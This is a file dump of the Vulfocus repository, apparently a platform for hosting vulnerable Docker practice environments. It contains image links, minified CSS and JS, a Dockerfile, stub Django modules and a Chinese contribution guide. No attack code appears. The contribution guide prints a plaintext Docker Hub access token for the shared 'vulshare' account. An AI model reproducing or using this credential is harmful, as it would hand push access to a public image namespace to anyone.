https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/cooperate/idss.png
--------------------------------------------------------------------------------
/cooperate/red-team.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/cooperate/red-team.png
--------------------------------------------------------------------------------
/cooperate/sierting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/cooperate/sierting.png
--------------------------------------------------------------------------------
/cooperate/snnu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/cooperate/snnu.png
--------------------------------------------------------------------------------
/data/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/data/db.sqlite3
--------------------------------------------------------------------------------
/data/static/user/bmh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/data/static/user/bmh.png
--------------------------------------------------------------------------------
/dist/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/favicon.ico
--------------------------------------------------------------------------------
/dist/favicon_back.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/favicon_back.ico
--------------------------------------------------------------------------------
/dist/index.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/index.png
--------------------------------------------------------------------------------
/dist/login_icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/login_icon.png
--------------------------------------------------------------------------------
/dist/static/css/chunk-25e2b1ca.c52976c7.css:
--------------------------------------------------------------------------------
1 | .word[data-v-67d88fd3]{z-index:53;position:absolute;top:6px;width:28px;display:block;overflow-wrap:break-word;margin-left:20px;color:#fff;font-size:14px;white-space:nowrap;line-height:14px}.main[data-v-67d88fd3]{z-index:52;width:70px;height:24px;margin-top:20px;border-radius:12px 0 0 12px;background-color:#fa3f3f}.hoveDesc[data-v-67d88fd3]{text-align:left;overflow:hidden;text-overflow:ellipsis;-o-text-overflow:ellipsis;white-space:nowrap;width:auto;display:block;word-break:keep-all;margin-top:2px}.word2[data-v-67d88fd3]{z-index:33;width:56px;display:block;overflow-wrap:break-word;color:#606266;font-size:14px;font-family:MicrosoftYaHei;white-space:nowrap;line-height:14px;margin-top:32px}.sceneSearch[data-v-67d88fd3]{width:360px;height:32px;background:#f2f4f7;border-radius:4px}
--------------------------------------------------------------------------------
/dist/static/css/chunk-4961a69c.74a73643.css:
--------------------------------------------------------------------------------
1 | .avatar-uploader .el-upload{border:1px dashed #d9d9d9;border-radius:6px;cursor:pointer;position:relative;overflow:hidden}.avatar-uploader .el-upload:hover{border-color:#409eff}.avatar-uploader-icon{font-size:28px;color:#8c939d;width:330px;height:178px;line-height:178px;text-align:center}.avatar{width:330px;height:178px;display:block}.relationContainer[data-v-2d548ad4]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}
--------------------------------------------------------------------------------
/dist/static/css/chunk-781c03bd.cdd0a300.css:
--------------------------------------------------------------------------------
1 | .hoveDesc[data-v-571de168]{text-align:left;overflow:hidden;text-overflow:ellipsis;-o-text-overflow:ellipsis;white-space:nowrap;width:auto;display:block;word-break:keep-all;margin-top:2px}.sceneSearch[data-v-571de168]{width:360px;height:32px;background:#f2f4f7;border-radius:4px}.word[data-v-571de168]{z-index:53;position:absolute;left:10px;top:6px;width:28px;display:block;overflow-wrap:break-word;color:#fff;font-size:14px;font-family:MicrosoftYaHei;white-space:nowrap;line-height:14px}.main[data-v-571de168]{z-index:52;width:70px;height:24px;margin-top:20px;border-radius:12px 0 0 12px;background-color:#fa3f3f}
--------------------------------------------------------------------------------
/dist/static/css/chunk-8c05fd72.d6edd1b6.css:
--------------------------------------------------------------------------------
1 | .el-carousel__item h3[data-v-3cc7d788],.el-carousel__item h[data-v-3cc7d788]{color:#00a6ac;font-size:14px;opacity:.75;line-height:140px;margin:0}.el-carousel__item[data-v-3cc7d788]:nth-child(2n){background-color:#90d7ec}.el-carousel__item[data-v-3cc7d788]:nth-child(odd){background-color:#009ad6}.el-button()[data-v-3cc7d788]{position:absolute;right:5px;bottom:5px}
--------------------------------------------------------------------------------
/dist/static/css/chunk-93a75d40.7bf68286.css:
--------------------------------------------------------------------------------
1 | .small[data-v-6c64923b]{font-size:80%}.btn-group svg[data-v-6c64923b]{width:14px;height:14px;margin-right:4px}.wd-title[data-v-6c64923b]{padding:10px 6px;color:#777;border-bottom:1px solid #777}.action-group[data-v-6c64923b]{padding:10px 6px}.pre[data-v-6c64923b]{padding:0 15px;color:#000;font-size:13px;border:1px solid #ccc;border-radius:4px}.line[data-v-6c64923b]{-webkit-margin-before:2px;margin-block-start:2px;-webkit-margin-after:2px;margin-block-end:2px}.el-tag+.el-tag[data-v-d52ff468]{margin-left:10px}.button-new-tag[data-v-d52ff468]{margin-left:10px;height:32px;line-height:30px;padding-top:0;padding-bottom:0}.input-new-tag[data-v-d52ff468]{width:90px;margin-left:10px;vertical-align:bottom}
--------------------------------------------------------------------------------
/dist/static/css/chunk-b0bede22.bb28d2f3.css:
--------------------------------------------------------------------------------
1 | .small[data-v-6c64923b]{font-size:80%}.btn-group svg[data-v-6c64923b]{width:14px;height:14px;margin-right:4px}.wd-title[data-v-6c64923b]{padding:10px 6px;color:#777;border-bottom:1px solid #777}.action-group[data-v-6c64923b]{padding:10px 6px}.pre[data-v-6c64923b]{padding:0 15px;color:#000;font-size:13px;border:1px solid #ccc;border-radius:4px}.line[data-v-6c64923b]{-webkit-margin-before:2px;margin-block-start:2px;-webkit-margin-after:2px;margin-block-end:2px}.el-tag+.el-tag[data-v-a16da89e]{margin-left:10px}.button-new-tag[data-v-a16da89e]{margin-left:10px;height:32px;line-height:30px;padding-top:0;padding-bottom:0}.input-new-tag[data-v-a16da89e]{width:90px;margin-left:10px;vertical-align:bottom}
--------------------------------------------------------------------------------
/dist/static/css/chunk-bd6376c8.5f3c40a1.css:
--------------------------------------------------------------------------------
1 | .avatar-uploader .el-upload[data-v-52d17433]{border:1px dashed #d9d9d9;border-radius:6px;cursor:pointer;position:relative;overflow:hidden}.avatar-uploader .el-upload[data-v-52d17433]:hover{border-color:#409eff}.avatar-uploader-icon[data-v-52d17433]{font-size:28px;color:#8c939d;width:120px;height:120px;line-height:120px;text-align:center}.avatar[data-v-52d17433]{width:120px;height:120px;display:block}.el-collapse-item__header[data-v-52d17433]{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.el-row[data-v-52d17433]{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.el-card[data-v-52d17433]{height:140px}
--------------------------------------------------------------------------------
/dist/static/fonts/element-icons.535877f5.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/element-icons.535877f5.woff
--------------------------------------------------------------------------------
/dist/static/fonts/element-icons.732389de.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/element-icons.732389de.ttf
--------------------------------------------------------------------------------
/dist/static/fonts/fontawesome-webfont.674f50d2.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/fontawesome-webfont.674f50d2.eot
--------------------------------------------------------------------------------
/dist/static/fonts/fontawesome-webfont.af7ae505.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/fontawesome-webfont.af7ae505.woff2
--------------------------------------------------------------------------------
/dist/static/fonts/fontawesome-webfont.b06871f2.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/fontawesome-webfont.b06871f2.ttf
--------------------------------------------------------------------------------
/dist/static/fonts/fontawesome-webfont.fee66e71.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/fonts/fontawesome-webfont.fee66e71.woff
--------------------------------------------------------------------------------
/dist/static/img/404.a57b6f31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/404.a57b6f31.png
--------------------------------------------------------------------------------
/dist/static/img/404_cloud.0f4bc32b.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/404_cloud.0f4bc32b.png
--------------------------------------------------------------------------------
/dist/static/img/Customs.323bde27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/Customs.323bde27.png
--------------------------------------------------------------------------------
/dist/static/img/loginbackground.c15277de.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/loginbackground.c15277de.png
--------------------------------------------------------------------------------
/dist/static/img/loginbg02.b43a333c.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/loginbg02.b43a333c.png
--------------------------------------------------------------------------------
/dist/static/img/loginl.1ee18fa2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/loginl.1ee18fa2.png
--------------------------------------------------------------------------------
/dist/static/img/logintitle.c2f6befc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/logintitle.c2f6befc.png
--------------------------------------------------------------------------------
/dist/static/img/modelbg.fcbe2049.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/modelbg.fcbe2049.jpg
--------------------------------------------------------------------------------
/dist/static/img/tui-editor-2x.b4361244.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/tui-editor-2x.b4361244.png
--------------------------------------------------------------------------------
/dist/static/img/tui-editor.30dd0f52.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/dist/static/img/tui-editor.30dd0f52.png
--------------------------------------------------------------------------------
/dist/static/js/chunk-2d0abdfd.e0124b63.js:
--------------------------------------------------------------------------------
1 | (window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-2d0abdfd"],{"16ac":function(e,t,s){"use strict";s.r(t);var n=function(){var e=this,t=e.$createElement,s=e._self._c||t;return s("div",[e.is_show?s("p",[e._v("您的账户已经被激活")]):e._e()])},a=[],r=s("c24f"),c={name:"activate",data:function(){return{is_show:!1}},created:function(){this.geturl()},methods:{geturl:function(){var e=this,t=this.$route.query.code;t?Object(r["b"])(t).then((function(t){var s=t.data;200===s.code?e.is_show=!0:e.$message({message:s.msg,type:"error"})})):this.$message({message:"无效的请求",type:"error"})}}},o=c,i=s("2877"),u=Object(i["a"])(o,n,a,!1,null,"be6c2636",null);t["default"]=u.exports}}]);
2 | //# sourceMappingURL=chunk-2d0abdfd.e0124b63.js.map
--------------------------------------------------------------------------------
/images/CONTRIBUTION.md:
--------------------------------------------------------------------------------
1 | ## 贡献漏洞
2 |
3 | 初期 Vulfocus 的漏洞镜像会较少,可能无法满足你的需求,所以非常期望大家来一起维护 Vulfocus,当你发现你的一些漏洞环境在 Vulfocus 中找不到时,可以提交供大家使用。一个有问题的环境可能会影响到使用者的情绪。因此我们对社区提交的漏洞环境会进行审核。贡献者在提交漏洞环境的时候,可提供相应的复现工具或流程,加速环境的审核。
4 |
5 | ## 更改镜像名称
6 |
7 | 将镜像名称更改为:vulshare/框架+cve编号:个人ID
8 |
9 | 例如:vulshare/weblogic-cve_2020_2883
10 |
11 | docker tag 镜像名称 vulshare/xxx-cve_2020_xxx:r4v3zn
12 |
13 | 个人 ID 作为贡献来源
14 |
15 | ## 登录到hub.docker
16 |
17 | 使用命令:
18 |
19 | 1、登录 dockerhub:
20 |
21 | `docker login --username vulshare`
22 |
23 | 接下来输入 token:
24 |
25 | `2a295233-801b-4efb-9f78-916330b984f6`
26 |
27 | 出现Succeeded说明登录成功
28 |
29 | ## 上传到vulshare
30 |
31 | `docker push vulshare/xxx-cve_2020_xxx:r4v3zn`
32 |
33 | 出现 sha256 说明上传成功
34 |
35 | 
36 |
37 | 可直接到 https://hub.docker.com/u/vulshare , 进行查看。
38 |
39 | 
40 |
41 |
--------------------------------------------------------------------------------
/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/1.png
--------------------------------------------------------------------------------
/imgs/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/10.png
--------------------------------------------------------------------------------
/imgs/11.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/11.gif
--------------------------------------------------------------------------------
/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/2.png
--------------------------------------------------------------------------------
/imgs/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/3.png
--------------------------------------------------------------------------------
/imgs/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/4.png
--------------------------------------------------------------------------------
/imgs/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/5.png
--------------------------------------------------------------------------------
/imgs/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/6.png
--------------------------------------------------------------------------------
/imgs/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/7.png
--------------------------------------------------------------------------------
/imgs/8.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/8.gif
--------------------------------------------------------------------------------
/imgs/9.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/9.gif
--------------------------------------------------------------------------------
/imgs/compose.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/compose.png
--------------------------------------------------------------------------------
/imgs/cpview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/cpview.png
--------------------------------------------------------------------------------
/imgs/docker_celery.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/docker_celery.png
--------------------------------------------------------------------------------
/imgs/docker_cp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/docker_cp.png
--------------------------------------------------------------------------------
/imgs/docker_logs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/docker_logs.png
--------------------------------------------------------------------------------
/imgs/example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/example.png
--------------------------------------------------------------------------------
/imgs/flag.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/flag.gif
--------------------------------------------------------------------------------
/imgs/image.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/image.gif
--------------------------------------------------------------------------------
/imgs/image_index.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/image_index.png
--------------------------------------------------------------------------------
/imgs/image_manage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/image_manage.png
--------------------------------------------------------------------------------
/imgs/image_point.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/image_point.png
--------------------------------------------------------------------------------
/imgs/login.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/login.PNG
--------------------------------------------------------------------------------
/imgs/login.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/login.gif
--------------------------------------------------------------------------------
/imgs/publish.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/publish.png
--------------------------------------------------------------------------------
/imgs/register&login.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/register&login.gif
--------------------------------------------------------------------------------
/imgs/register.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/register.gif
--------------------------------------------------------------------------------
/imgs/rm_migrations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/rm_migrations.png
--------------------------------------------------------------------------------
/imgs/save_scene.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/save_scene.png
--------------------------------------------------------------------------------
/imgs/scene_index.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/scene_index.png
--------------------------------------------------------------------------------
/imgs/system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/system.png
--------------------------------------------------------------------------------
/imgs/tp5_rce.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/tp5_rce.gif
--------------------------------------------------------------------------------
/imgs/upload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/upload.png
--------------------------------------------------------------------------------
/imgs/upload_image_file.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/upload_image_file.gif
--------------------------------------------------------------------------------
/imgs/upload_image_pull.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/upload_image_pull.gif
--------------------------------------------------------------------------------
/imgs/upload_scene.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/upload_scene.png
--------------------------------------------------------------------------------
/imgs/views.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/views.png
--------------------------------------------------------------------------------
/imgs/wechat.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/imgs/wechat.jpeg
--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Document
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/vulfocus-api/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7-alpine3.15
2 | LABEL maintainer="vulfocus" version="0.3.2.11" description="Vulfocus for Docker"
3 |
4 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories
5 | RUN apk add gcc g++ libzip-dev jpeg-dev libffi-dev freetype-dev
6 |
7 | RUN mkdir /vulfocus-api/
8 | WORKDIR /vulfocus-api/
9 | ADD . /vulfocus-api/
10 |
11 | ENV VUL_IP=""
12 | ENV EMAIL_HOST=""
13 | ENV EMAIL_HOST_USER=""
14 | ENV EMAIL_HOST_PASSWORD=""
15 | ENV DOCKER_URL="unix://var/run/docker.sock"
16 |
17 |
18 | RUN python3 -m pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple
19 | RUN pip install -i https://pypi.tuna.tsinghua.edu.cn/simple some-package -r requirements.txt
20 |
21 | EXPOSE 8000
22 |
23 | CMD ["python3", "manage.py", "runserver", "0.0.0.0:8000"]
--------------------------------------------------------------------------------
/vulfocus-api/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/db.sqlite3
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/dockerapi/.DS_Store
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/dockerapi/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class DockerapiConfig(AppConfig):
5 | name = 'dockerapi'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/migrations/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/dockerapi/migrations/.DS_Store
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/dockerapi/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/dockerapi/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/layout_image/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/layout_image/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/layout_image/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/layout_image/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class LayoutImageConfig(AppConfig):
5 | name = 'layout_image'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/layout_image/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/layout_image/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | """Django's command-line utility for administrative tasks."""
3 | import os
4 | import sys
5 |
6 |
7 | def main():
8 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vulfocus.settings')
9 | try:
10 | from django.core.management import execute_from_command_line
11 | except ImportError as exc:
12 | raise ImportError(
13 | "Couldn't import Django. Are you sure it's installed and "
14 | "available on your PYTHONPATH environment variable? Did you "
15 | "forget to activate a virtual environment?"
16 | ) from exc
17 | execute_from_command_line(sys.argv)
18 |
19 |
20 | if __name__ == '__main__':
21 | main()
22 |
--------------------------------------------------------------------------------
/vulfocus-api/network/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/network/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/network/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/network/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class NetworkConfig(AppConfig):
5 | name = 'network'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/network/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/network/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/network/serializers.py:
--------------------------------------------------------------------------------
1 | from rest_framework import serializers
2 | from network.models import NetWorkInfo
3 |
4 |
5 | class NetWorkInfoSerializer(serializers.ModelSerializer):
6 | class Meta:
7 | model = NetWorkInfo
8 | fields = '__all__'
9 |
--------------------------------------------------------------------------------
/vulfocus-api/network/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/notice/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/notice/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/notice/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/notice/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class NoticeConfig(AppConfig):
5 | name = 'notice'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/notice/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/notice/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/notice/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 | import uuid
3 |
4 | # Create your models here.
5 | # 系统通知模块
6 |
7 |
8 | class Notice(models.Model):
9 | notice_id = models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True)
10 | title = models.CharField(max_length=255, verbose_name="公告名称", null=False)
11 | notice_content = models.TextField(verbose_name="公告内容", null=False)
12 | create_date = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
13 | update_date = models.DateTimeField(auto_now=True, verbose_name="更新时间")
